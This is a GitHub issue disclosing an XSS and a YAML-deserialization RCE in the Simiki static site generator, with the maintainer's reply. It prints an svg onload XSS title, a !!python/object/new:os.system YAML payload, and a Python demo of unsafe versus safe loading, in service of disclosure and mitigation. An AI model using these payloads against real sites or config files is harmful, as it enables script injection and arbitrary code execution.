tankywoo/simiki

Simiki <=v1.6.2.1 XSS + RCE

deFming opened this issue · 1 comment

1. XSS

Examples:

python3 -m simiki.cli new -t "Hello Simiki<svg/onload=alert(1)>" -c first-category

python3 -m simiki.cli g
python3 -m simiki.cli p


The affected file appears to be
https://github.com/tankywoo/simiki/blob/master/simiki/generators.py Line 54

By default, jinja2 sets autoescape to False. Consider using autoescape=True or use the select_autoescape function to mitigate XSS vulnerabilities.

2. RCE

https://github.com/tankywoo/simiki/blob/master/simiki/config.py line 64
Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

This can lead to remote code execution.

When Simiki loads a malicious _config.yml file.

Payload:

!!python/object/new:os.system ["/Applications/Calculator.app/Contents/MacOS/Calculator"]

When using Simiki again, Simiki will load _config.yml and cause remote code execution.
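Both findings in the report, as one added Python example that is not simiki's code and not its theme: a stand-in Jinja2 page template rendered with autoescape off (the Jinja2 default) and on, and a constructed _config.yml carrying the same kind of python/object tag as the payload above, loaded with PyYAML's unsafe and safe loaders. The template string, the sample body HTML and the echo-based tag are assumptions for illustration; the title is the one from the report. Requires jinja2 and pyyaml.

```python
"""Added example for the two findings in the report (not simiki's own code and
not its theme): a stand-in Jinja2 page template rendered with autoescape off
and on, and a constructed _config.yml loaded with PyYAML's unsafe and safe
loaders.  Requires jinja2 and pyyaml."""
import yaml
from jinja2 import Environment, select_autoescape

# Assumption: a minimal page template standing in for a theme template.  The
# `| safe` filter is the theme-side change the maintainer mentions: once
# autoescape is on, HTML the generator already produced (the converted
# Markdown body) must be marked safe or it will be escaped as well.
PAGE_TEMPLATE = "<h1>{{ title }}</h1>\n<article>{{ content | safe }}</article>"

# The title from the report, plus a constructed body in place of rendered Markdown.
XSS_TITLE = "Hello Simiki<svg/onload=alert(1)>"
PAGE_BODY_HTML = "<p>first post</p>"


def render_page(title, body_html, autoescape=False):
    """Render PAGE_TEMPLATE.  `autoescape` is passed straight to Jinja2's
    Environment: False reproduces the Jinja2 default the report points at,
    True escapes every interpolated value that is not marked safe."""
    env = Environment(autoescape=autoescape)
    return env.from_string(PAGE_TEMPLATE).render(title=title, content=body_html)


def render_page_hardened(title, body_html):
    """The select_autoescape() variant the report recommends: escapes *.html,
    *.htm and *.xml templates and, via default_for_string=True, templates
    built from strings like this one."""
    env = Environment(autoescape=select_autoescape())
    return env.from_string(PAGE_TEMPLATE).render(title=title, content=body_html)


# Constructed _config.yml with the same kind of tag as the report's payload.
# The command is a harmless `echo` instead of launching Calculator; any
# function reachable by module path could be named here, and the unsafe
# loader imports the named module itself.
MALICIOUS_CONFIG = """\
url: http://example.com
title: !!python/object/new:subprocess.check_output [[echo, pwned]]
"""

BENIGN_CONFIG = """\
url: http://example.com
title: Hello Simiki
"""


def load_config_unsafe(text):
    """What a bare `yaml.load(f)` did on PyYAML < 5.1: python/* tags are
    honoured, so the call named in the tag runs while the file is parsed."""
    return yaml.load(text, Loader=yaml.UnsafeLoader)


def load_config_safe(text):
    """yaml.safe_load builds only plain YAML types (str, int, list, dict, ...)
    and raises yaml.constructor.ConstructorError on the python/object tag."""
    return yaml.safe_load(text)


def safe_load_rejects(text):
    """True if safe_load refuses the document instead of executing anything."""
    try:
        yaml.safe_load(text)
    except yaml.YAMLError:
        return True
    return False


if __name__ == "__main__":
    print(render_page(XSS_TITLE, PAGE_BODY_HTML, autoescape=False))
    print(render_page(XSS_TITLE, PAGE_BODY_HTML, autoescape=True))
    print(render_page_hardened(XSS_TITLE, PAGE_BODY_HTML))
    print(load_config_unsafe(MALICIOUS_CONFIG))   # title holds echo's output
    print(safe_load_rejects(MALICIOUS_CONFIG))    # True
    print(load_config_safe(BENIGN_CONFIG))
```

With autoescape off the `<svg/onload=...>` from the title lands in the page verbatim; with it on (either `autoescape=True` or `select_autoescape()`) the angle brackets become `&lt;` and `&gt;` while the `| safe` body is left intact, which is why enabling autoescape has to go together with marking trusted HTML safe in the theme. On the YAML side the unsafe loader returns the command's output as the value of `title`, i.e. the code ran during parsing, whereas `safe_load` raises on the tag and never reaches the named function.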

Thanks for your report.

For the first problem, enabling autoescape requires the theme to also add safe, and I will fix it later.

The second problem was fixed in version 1.6.2.2.